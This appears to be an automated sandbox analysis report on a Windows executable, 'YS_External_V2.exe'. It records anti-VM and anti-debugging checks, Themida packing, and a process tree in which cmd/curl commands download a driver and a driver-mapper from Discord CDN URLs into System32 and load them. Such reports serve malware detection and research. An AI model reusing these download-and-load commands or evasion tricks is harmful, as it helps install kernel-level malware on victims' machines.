Analysis
-
max time kernel
21s -
max time network
36s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
25-03-2023 17:31
Behavioral task
behavioral1
Sample
YS_External_V2.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
YS_External_V2.exe
Resource
win10v2004-20230220-en
General
-
Target
YS_External_V2.exe
-
Size
23.7MB
-
MD5
a55deccd022c6cf5a67bd3138a0a6d69
-
SHA1
cef90145fa44b969af6ec76b7ac650e778e5c953
-
SHA256
914d9b43d9d945fe5c372487ffa692b6d1d68e64945a726b2c35699c31af661e
-
SHA512
b797d8ab14c3acc232d243c5a7bd0958929d93c4ba96b4dd68f3167c5b8753c63a874b1a6f0cdcd7f43dcb250958e0572b23ceee6b6e36a1fb1a011fb2e5ada6
-
SSDEEP
393216:Mm9FpgMIfmAL0Fnch/d9WOBkUS9RBnuBRhfvSoWchi3x1Bn:D97gb0dcd9jkLT8BjYc2N
Malware Config
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
YS_External_V2.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ YS_External_V2.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
yamsmapper.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\frAQBc8Wsa1xVPfv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\frAQBc8Wsa1xVPfv" yamsmapper.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
YS_External_V2.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion YS_External_V2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion YS_External_V2.exe -
Executes dropped EXE 1 IoCs
Processes:
yamsmapper.exepid process 1976 yamsmapper.exe -
Processes:
resource yara_rule behavioral2/memory/2676-133-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp themida behavioral2/memory/2676-135-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp themida behavioral2/memory/2676-134-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp themida behavioral2/memory/2676-136-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp themida behavioral2/memory/2676-137-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp themida behavioral2/memory/2676-138-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp themida behavioral2/memory/2676-146-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmp themida -
Processes:
YS_External_V2.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA YS_External_V2.exe -
Drops file in System32 directory 2 IoCs
Processes:
curl.execurl.exedescription ioc process File created C:\Windows\System32\yamsud.sys curl.exe File created C:\Windows\System32\yamsmapper.exe curl.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
YS_External_V2.exepid process 2676 YS_External_V2.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
yamsmapper.exepid process 1976 yamsmapper.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
yamsmapper.exedescription pid process Token: SeLoadDriverPrivilege 1976 yamsmapper.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
YS_External_V2.execmd.execmd.execmd.exedescription pid process target process PID 2676 wrote to memory of 1292 2676 YS_External_V2.exe cmd.exe PID 2676 wrote to memory of 1292 2676 YS_External_V2.exe cmd.exe PID 2676 wrote to memory of 3572 2676 YS_External_V2.exe cmd.exe PID 2676 wrote to memory of 3572 2676 YS_External_V2.exe cmd.exe PID 3572 wrote to memory of 3652 3572 cmd.exe curl.exe PID 3572 wrote to memory of 3652 3572 cmd.exe curl.exe PID 2676 wrote to memory of 536 2676 YS_External_V2.exe cmd.exe PID 2676 wrote to memory of 536 2676 YS_External_V2.exe cmd.exe PID 536 wrote to memory of 180 536 cmd.exe curl.exe PID 536 wrote to memory of 180 536 cmd.exe curl.exe PID 2676 wrote to memory of 112 2676 YS_External_V2.exe cmd.exe PID 2676 wrote to memory of 112 2676 YS_External_V2.exe cmd.exe PID 2676 wrote to memory of 3944 2676 YS_External_V2.exe cmd.exe PID 2676 wrote to memory of 3944 2676 YS_External_V2.exe cmd.exe PID 3944 wrote to memory of 1976 3944 cmd.exe yamsmapper.exe PID 3944 wrote to memory of 1976 3944 cmd.exe yamsmapper.exe PID 2676 wrote to memory of 4248 2676 YS_External_V2.exe cmd.exe PID 2676 wrote to memory of 4248 2676 YS_External_V2.exe cmd.exe PID 2676 wrote to memory of 4932 2676 YS_External_V2.exe cmd.exe PID 2676 wrote to memory of 4932 2676 YS_External_V2.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\YS_External_V2.exe"C:\Users\Admin\AppData\Local\Temp\YS_External_V2.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645544439828/yamsud.sys --output C:\Windows\System32\yamsud.sys3⤵
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\curl.execurl https://cdn.discordapp.com/attachments/1077305966531444837/1077321645909348533/yamsmapper.exe --output C:\Windows\System32\yamsmapper.exe3⤵
- Drops file in System32 directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\yamsmapper.exeC:\Windows\System32\yamsmapper.exe C:\Windows\System32\yamsud.sys3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause >nul 2>&12⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\System32\yamsmapper.exeFilesize
153KB
MD5666d7f4bb7cf64772755b9a184486525
SHA1a645d988ff67e72aac11cc9560dbf89a8320aef0
SHA256a8502e1484cfaae9f59a69ba44b51de2fc019a92e154dfe094be63b70513b577
SHA5123670d792b05eda6952badb5ff7d20331db2db647d05181552f3067e6d0932cf6c178e0aca623fa9bd382e3cbfdb8781d9bc34ac306e2f85c84fee435cc7f0864
-
C:\Windows\System32\yamsmapper.exeFilesize
153KB
MD5666d7f4bb7cf64772755b9a184486525
SHA1a645d988ff67e72aac11cc9560dbf89a8320aef0
SHA256a8502e1484cfaae9f59a69ba44b51de2fc019a92e154dfe094be63b70513b577
SHA5123670d792b05eda6952badb5ff7d20331db2db647d05181552f3067e6d0932cf6c178e0aca623fa9bd382e3cbfdb8781d9bc34ac306e2f85c84fee435cc7f0864
-
C:\Windows\System32\yamsud.sysFilesize
12KB
MD5141ecbccc4bfbf03b8768232d5c6a273
SHA10e0c0340b8bccfd6aa352e80739c882e4bbe5404
SHA2562be40511b4f941f899dcfc579c7f31cfd555292d325d7089a69be76bc9eab122
SHA512aa0f0bdfab84a6b41006acf40ecfc87aa8bbe5a576d1e696e5c099140e0ac8b2d144d60b112f045dbcc7f13d21b34580b842fe42e9f38727688cddbc4f1787a7
-
memory/2676-133-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmpFilesize
37.1MB
-
memory/2676-135-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmpFilesize
37.1MB
-
memory/2676-134-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmpFilesize
37.1MB
-
memory/2676-136-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmpFilesize
37.1MB
-
memory/2676-137-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmpFilesize
37.1MB
-
memory/2676-138-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmpFilesize
37.1MB
-
memory/2676-146-0x00007FF704AE0000-0x00007FF706FF9000-memory.dmpFilesize
37.1MB